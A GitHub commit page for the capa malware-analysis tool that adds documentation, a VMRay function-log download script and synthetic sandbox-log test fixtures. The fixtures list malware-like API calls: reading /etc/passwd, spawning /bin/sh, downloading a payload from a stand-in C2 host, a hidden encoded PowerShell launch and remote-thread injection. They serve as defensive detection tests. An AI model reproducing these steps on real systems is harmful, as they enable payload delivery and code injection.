Skip to content

Commit 548d814

Browse files
committed
vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt
Addresses reviewer feedback on #2878: 1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size). 2. Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it. 3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files: - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped) - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear). Fixes #2878
1 parent b924721 commit 548d814

7 files changed

Lines changed: 709 additions & 11 deletions

File tree

CHANGELOG.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,7 @@
66

77
- ghidra: support PyGhidra @mike-hunhoff #2788
88
- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
9+
- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
910
- vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
1011

1112
### Breaking Changes

doc/usage.md

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -16,6 +16,36 @@ See `capa -h` for all supported arguments and usage examples.
1616

1717
By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched.
1818

19+
## VMRay: flog.txt vs full analysis archive
20+
21+
When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
22+
Choose based on what you have access to and what features you need.
23+
24+
| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
25+
|-|-|-|
26+
| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
27+
| **File size** | Small text file | Large encrypted ZIP |
28+
| **Dynamic API calls** |||
29+
| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
30+
| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
31+
| **Static imports / exports** |||
32+
| **PE/ELF section names** |||
33+
| **Embedded file strings** |||
34+
| **Base address** |||
35+
| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
36+
37+
**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
38+
39+
**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
40+
41+
```
42+
# flog.txt — free, limited to dynamic API calls
43+
capa path/to/flog.txt
44+
45+
# Full VMRay archive — requires subscription, richer features
46+
capa path/to/analysis_archive.zip
47+
```
48+
1949
## tips and tricks
2050

2151
### only run selected rules

scripts/fetch-vmray-flog.py

Lines changed: 270 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,270 @@
1+
#!/usr/bin/env python3
2+
# Copyright 2025 Google LLC
3+
#
4+
# Licensed under the Apache License, Version 2.0 (the "License");
5+
# you may not use this file except in compliance with the License.
6+
# You may obtain a copy of the License at
7+
#
8+
# http://www.apache.org/licenses/LICENSE-2.0
9+
#
10+
# Unless required by applicable law or agreed to in writing, software
11+
# distributed under the License is distributed on an "AS IS" BASIS,
12+
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13+
# See the License for the specific language governing permissions and
14+
# limitations under the License.
15+
16+
"""
17+
Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
18+
19+
Given a sample SHA-256 hash and VMRay credentials, this script:
20+
1. Looks up the sample on the VMRay instance.
21+
2. Finds the most-recent analysis for that sample.
22+
3. Downloads the flog.txt (Download Function Log) from the analysis archive.
23+
4. Optionally runs capa against the downloaded file.
24+
25+
Requirements:
26+
pip install requests
27+
28+
Usage::
29+
30+
python scripts/fetch-vmray-flog.py \\
31+
--url https://your-vmray.example.com \\
32+
--apikey YOUR_API_KEY \\
33+
--sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
34+
--output /tmp/sample_flog.txt
35+
36+
# Fetch and immediately run capa:
37+
python scripts/fetch-vmray-flog.py \\
38+
--url https://your-vmray.example.com \\
39+
--apikey YOUR_API_KEY \\
40+
--sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
41+
--run-capa
42+
43+
VMRay API reference:
44+
https://docs.vmray.com/documents/api-reference/
45+
46+
Note: this script requires a VMRay account. The flog.txt itself is freely available
47+
("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
48+
programmatically via the REST API requires valid API credentials.
49+
"""
50+
51+
import argparse
52+
import logging
53+
import subprocess
54+
import sys
55+
from pathlib import Path
56+
57+
import requests
58+
59+
logger = logging.getLogger(__name__)
60+
61+
# ---------------------------------------------------------------------------
62+
# VMRay REST API helpers
63+
# ---------------------------------------------------------------------------
64+
65+
_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
66+
67+
68+
def _session(url: str, apikey: str) -> requests.Session:
69+
"""Return an authenticated requests.Session for the given VMRay instance."""
70+
s = requests.Session()
71+
s.headers.update(
72+
{
73+
"Authorization": f"api_key {apikey}",
74+
"Accept": "application/json",
75+
}
76+
)
77+
s.verify = True # set to False only when using self-signed certificates
78+
s.base_url = url.rstrip("/") # type: ignore[attr-defined]
79+
return s
80+
81+
82+
def _get(session: requests.Session, path: str, **kwargs) -> dict:
83+
url = f"{session.base_url}{path}" # type: ignore[attr-defined]
84+
resp = session.get(url, **kwargs)
85+
resp.raise_for_status()
86+
return resp.json()
87+
88+
89+
def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
90+
url = f"{session.base_url}{path}" # type: ignore[attr-defined]
91+
resp = session.get(url, **kwargs)
92+
resp.raise_for_status()
93+
return resp.content
94+
95+
96+
def lookup_sample(session: requests.Session, sha256: str) -> dict:
97+
"""
98+
Return the VMRay sample record for the given SHA-256.
99+
Raises ValueError if the sample is not found.
100+
"""
101+
data = _get(session, f"/rest/sample/sha256/{sha256}")
102+
if data.get("result") != "ok" or not data.get("data"):
103+
raise ValueError(f"sample not found on VMRay instance: {sha256}")
104+
# data["data"] is a list; take the first entry
105+
return data["data"][0]
106+
107+
108+
def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
109+
"""
110+
Return the most-recent finished analysis for the given VMRay sample ID.
111+
Raises ValueError if no analysis is found.
112+
"""
113+
data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
114+
analyses = data.get("data", [])
115+
if not analyses:
116+
raise ValueError(f"no analyses found for sample_id={sample_id}")
117+
# Sort by analysis_id descending (newest first)
118+
analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
119+
return analyses[0]
120+
121+
122+
def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
123+
"""
124+
Download the flog.txt content for the given VMRay analysis ID.
125+
126+
VMRay exposes the function log via the analysis archive endpoint.
127+
We request only the flog_txt entry from the archive using the
128+
``file_filter`` query parameter.
129+
"""
130+
# Try the dedicated log endpoint first (VMRay >= 2024.x)
131+
try:
132+
content = _get_bytes(
133+
session,
134+
f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
135+
)
136+
if content:
137+
return content
138+
except requests.HTTPError:
139+
pass
140+
141+
# Fallback: download via the analysis archive with a file filter
142+
content = _get_bytes(
143+
session,
144+
f"/rest/analysis/{analysis_id}/archive",
145+
params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
146+
)
147+
return content
148+
149+
150+
# ---------------------------------------------------------------------------
151+
# main
152+
# ---------------------------------------------------------------------------
153+
154+
155+
def main(argv=None):
156+
if argv is None:
157+
argv = sys.argv[1:]
158+
159+
parser = argparse.ArgumentParser(
160+
description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
161+
)
162+
parser.add_argument(
163+
"--url",
164+
required=True,
165+
metavar="URL",
166+
help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
167+
)
168+
parser.add_argument(
169+
"--apikey",
170+
required=True,
171+
metavar="KEY",
172+
help="VMRay REST API key (Settings → API Keys).",
173+
)
174+
parser.add_argument(
175+
"--sha256",
176+
required=True,
177+
metavar="SHA256",
178+
help="SHA-256 hash of the sample to analyse.",
179+
)
180+
parser.add_argument(
181+
"--output",
182+
metavar="PATH",
183+
help="Where to save the downloaded flog.txt. Defaults to <sha256>_flog.txt in the current directory.",
184+
)
185+
parser.add_argument(
186+
"--run-capa",
187+
action="store_true",
188+
dest="run_capa",
189+
help="After downloading, run 'capa <output>' and print the results.",
190+
)
191+
parser.add_argument(
192+
"--capa-args",
193+
metavar="ARGS",
194+
default="",
195+
help="Extra arguments forwarded to capa (only used with --run-capa).",
196+
)
197+
parser.add_argument(
198+
"--no-verify-ssl",
199+
action="store_false",
200+
dest="verify_ssl",
201+
help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
202+
)
203+
parser.add_argument(
204+
"-d", "--debug", action="store_true", help="Enable debug logging."
205+
)
206+
args = parser.parse_args(argv)
207+
208+
logging.basicConfig(
209+
level=logging.DEBUG if args.debug else logging.INFO,
210+
format="%(levelname)s: %(message)s",
211+
)
212+
213+
output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
214+
215+
session = _session(args.url, args.apikey)
216+
session.verify = args.verify_ssl # type: ignore[assignment]
217+
218+
# Step 1 — look up sample
219+
logger.info("looking up sample %s …", args.sha256)
220+
try:
221+
sample = lookup_sample(session, args.sha256)
222+
except (requests.HTTPError, ValueError) as exc:
223+
logger.error("failed to find sample: %s", exc)
224+
return 1
225+
226+
sample_id: int = sample["sample_id"]
227+
logger.debug("found sample_id=%d", sample_id)
228+
229+
# Step 2 — find the latest analysis
230+
logger.info("fetching analysis list for sample_id=%d …", sample_id)
231+
try:
232+
analysis = get_latest_analysis(session, sample_id)
233+
except (requests.HTTPError, ValueError) as exc:
234+
logger.error("failed to find analysis: %s", exc)
235+
return 1
236+
237+
analysis_id: int = analysis["analysis_id"]
238+
logger.debug("using analysis_id=%d", analysis_id)
239+
240+
# Step 3 — download flog.txt
241+
logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
242+
try:
243+
flog_bytes = download_flog_txt(session, analysis_id)
244+
except requests.HTTPError as exc:
245+
logger.error("failed to download flog.txt: %s", exc)
246+
return 1
247+
248+
if not flog_bytes:
249+
logger.error(
250+
"received empty response — flog.txt may not be available for this analysis"
251+
)
252+
return 1
253+
254+
output_path.write_bytes(flog_bytes)
255+
logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
256+
257+
# Step 4 (optional) — run capa
258+
if args.run_capa:
259+
capa_cmd = ["capa", str(output_path)] + (
260+
args.capa_args.split() if args.capa_args else []
261+
)
262+
logger.info("running: %s", " ".join(capa_cmd))
263+
result = subprocess.run(capa_cmd)
264+
return result.returncode
265+
266+
return 0
267+
268+
269+
if __name__ == "__main__":
270+
sys.exit(main())
Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
# Log Creation Date: 02.01.2025 12:00:00
2+
# Analyzer Version: 2024.4.1
3+
# Flog Txt Version 1
4+
5+
Process:
6+
id = "1"
7+
os_pid = "0x1234"
8+
os_parent_pid = "0x1"
9+
parent_id = "0"
10+
image_name = "backdoor"
11+
filename = "/tmp/backdoor"
12+
cmd_line = "/tmp/backdoor"
13+
monitor_reason = "analysis_target"
14+
15+
Region:
16+
id = "1"
17+
name = "stack"
18+
19+
Thread:
20+
id = "1"
21+
os_tid = "0x1234"
22+
[0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
23+
[0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
24+
[0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
25+
[0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
26+
[0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
27+
[0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
28+
[0001.006] sys_fork () returned 0x2345
29+
[0001.007] sys_getuid () returned 0x0
30+
[0001.008] sys_setuid (uid=0x0) returned 0x0
31+
[0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
32+
[0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
33+
[0001.011] sys_time (tloc=0x0) returned 0x677f2000
34+
[0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
35+
[0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
36+
[0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
37+
[0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
38+
[0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
39+
[0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
40+
[0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
41+
[0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
42+
[0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
43+
[0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
# Log Creation Date: 03.01.2025 08:00:00
2+
# Analyzer Version: 2024.4.1
3+
# Flog Txt Version 1
4+
5+
Process:
6+
id = "1"
7+
os_pid = "0x2000"
8+
os_parent_pid = "0x4"
9+
parent_id = "0"
10+
image_name = "edgecase.exe"
11+
filename = "c:\\users\\test\\edgecase.exe"
12+
cmd_line = "edgecase.exe"
13+
monitor_reason = "analysis_target"
14+
15+
Region:
16+
id = "5"
17+
name = "private_0x0000000000010000"
18+
19+
Thread:
20+
id = "1"
21+
os_tid = "0x2100"
22+
[0001.000] GetCurrentProcess () returned 0xffffffffffffffff
23+
[0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
24+
[0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
25+
[0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
26+
[0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
27+
[0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
28+
[0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
29+
[0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
30+
[0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
31+
[0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
32+
[0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
33+
[0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
34+
[0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
35+
[0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
36+
[0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
37+
[0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200

0 commit comments

Comments
 (0)